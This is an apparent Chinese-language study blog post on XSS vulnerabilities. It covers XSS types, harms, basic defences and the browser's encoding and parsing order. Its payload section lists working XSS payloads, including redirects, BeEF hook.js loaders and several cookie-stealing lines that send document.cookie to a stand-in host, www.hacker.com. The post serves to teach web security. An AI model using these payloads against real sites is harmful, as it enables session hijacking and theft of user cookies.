当前位置：网站首页>xss漏洞学习

xss漏洞学习

2022-08-01 10:13:00 【miracle-boy】

一、XSS的原理

跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击！

二、Xss漏洞分类

1. 反射性xss

反射型XSS 是非持久性、参数型的跨站脚本。反射型XSS 的JS 代码在Web 应用的参数（变量）中，如搜索框的反射型XSS。在搜索框中，提交PoC[scriptalert(/xss/)/script]，点击搜索，即可触发反射型XSS。注意到，我们提交的poc 会出现在search.php 页面的keywords 参数中。

2.存储型XSS

存储型XSS 是持久性跨站脚本。持久性体现在XSS 代码不是在某个参数（变量）中，而是写进数据库或文件等可以永久保存数据的介质中。存储型XSS 通常发生在留言板等地方。我们在留言板位置留言，将恶意代码写进数据库中。此时，我们只完成了第一步，将恶意代码写入数据库。因为XSS 使用的JS 代码，JS 代码的运行环境是浏览器，所以需要浏览器从服务器载入恶意的XSS 代码，才能真正触发XSS。此时，需要我们模拟网站后台管理员的身份，查看留言。

3.基于DOM的 XSS

DOM XSS 比较特殊。owasp 关于DOM 型号XSS 的定义是基于DOM 的XSS 是一种XSS 攻击，其中攻击的payload由于修改受害者浏览器页面的DOM 树而执行的。其特殊的地方就是payload 在浏览器本地修改DOM 树而执行，并不会传到服务器上，这也就使得DOM XSS 比较难以检测。

三、xss漏洞的危害

XSS攻击的危害包括：

1、盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号

2、控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力

3、盗窃企业重要的具有商业价值的资料

4、非法转账

5、强制发送电子邮件

6、网站挂马

7、控制受害者机器向其它网站发起攻击

四、常见的xss漏洞防御方法

1、过滤JavaScript关键字，过滤onclick、onerror等关键字中的共有部分

2、过滤特定标签，如<svg><script><a><img>等

3、过滤在html中有特殊含义的符号，如'<‘,’>’,”‘”,'”‘等

4、限制用户输入的字符串长度

五、构造xss脚本

1.弹框警告

此脚本实现弹框提示，一般作为漏洞测试或者演示使用,类似SQL注入漏洞测试中的单引号', 一旦此脚本能执行，也就意味着后端服务器没有对特殊字符做过滤<>/' 这样就可以证明，这个页面位置存在了XSS漏洞。
<script>alert('xss')</script>
<script>alert(document.cookie)</script>

2.页面嵌套

<iframe src=http://www.baidu.com width=300 height=300></iframe>
<iframe src=http://www.baidu.com width=0 height=0 border=0></iframe>

3.页面重定向

<script>window.location="http://www.qfedu.com"</script>
<script>location.href="http://www.baidu.com"</script>

4.访问恶意代码

<script src="http://www.qfedu.com/xss.js"></script>
<script src="http://BeEF_IP:3000/hook.js"></script> #结合BeEF收集用户的cookie

5.巧用图片标签

<img src="#" οnerrοr=alert('xss')>
<img src="javascript:alert('xss');">
<img src="http://BeEF_IP:3000/hook.js"></img>

6.收集用户cookie

打开新窗口并且采用本地cookie访问目标网页，打开新窗口并且采用本地cookie访问目标网页。
<script>window.open("http://www.hacker.com/cookie.php?cookie="+document.cookie)</script>
<script>document.location="http://www.hacker.com/cookie.php?cookie="+document.cookie</script>
<script>new Image().src="http://www.hacker.com/cookie.php?cookie="+document.cookie;</script>
<img src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></img>
<iframe src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></iframe>

六、浏览器解析编码的顺序

首先是解析HTML实体编码 #，然后URLcode编码%，最后JavaScript中的Unicode编码u

具体规则是咋样的，我们来看具体案例：

<a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29">aaaa</a>

解析时先解析HTML实体编码，没有HTML实体编码，跳过，检测到URLcode，直接将编码给URL模块进行解析，解析结果为javascript:alert(1)，但是URL模块并不能解析javascript伪协议，所以不会对alert(1)进行执行

<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61%6c%65%72%74%28%32%29">

解析时先解析HTML实体编码为javascript关键字，后面url解析得到javascript:alert(2),然后执行js,由于是javascript协议，解码完给JS模块处理，于是被执行。

<textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>

<textarea>是RCDATA元素（RCDATA elements），可以容纳文本和字符引用，注意不能容纳其他元素，HTML解码得到<textarea><script>alert(5)</script></textarea> ，因此可以被解析，但是不会被执行。

<script>\u0061\u006c\u0065\u0072\u0074(\u0031\u0032)</script>

这里看似将没毛病，但是这里\u0031\u0032在解码的时候会被解码为字符串12，注意是字符串，不是数字，文字显然是需要引号的，JS执行失败

<div>&#60;img src=x onerror=alert(4)&#62;</div>

这里包含了HTML编码内容，反过来以开发者的角度思考，HTML编码就是为了显示这些特殊字符，而不干扰正常的DOM解析，所以这里面的内容不会变成一个img元素，也不会被执行.从HTML解析机制看，在读取<div>之后进入数据状态，<会被HTML解码，但不会进入标签开始状态，当然也就不会创建img元素，也就不会执行

6.

<button onclick="confirm('7&#39;);">Button</button>

这里会首先通过实体编码转换成<button οnclick="confirm('7');">Button</button>，从而执行jS的点击事件，所以这样编码也是可以执行的。

<script>alert('14\u000a')</script>

\u000a在JavaScript里是换行，就是\n，直接执行

总结：

<script>和<style>数据只能有文本，不会有HTML解码和URL解码操作
<textarea>和<title>里会有HTML解码操作，但不会有子元素，所以不会被执行，放弃
其他元素数据（如div）和元素属性数据（如href）中会有HTML解码操作
部分属性（如href）会有URL解码操作，但URL中的协议需为ASCII，不要编码协议
JavaScript会对字符串和标识符Unicode解码，所以尽量不要编码一些特殊符号

HTML解析器

HTML解析器是一个状态器，它的初始状态是数据状态（Data State），当文档流进入浏览器时，一直到读取到第一个'<‘，状态转为标签开始状态（Tag Open State），然后进行一个a-z的字符读取，进入标签名状态（Tag Name State），一直到读取到’>’，回到数据状态（Data State）。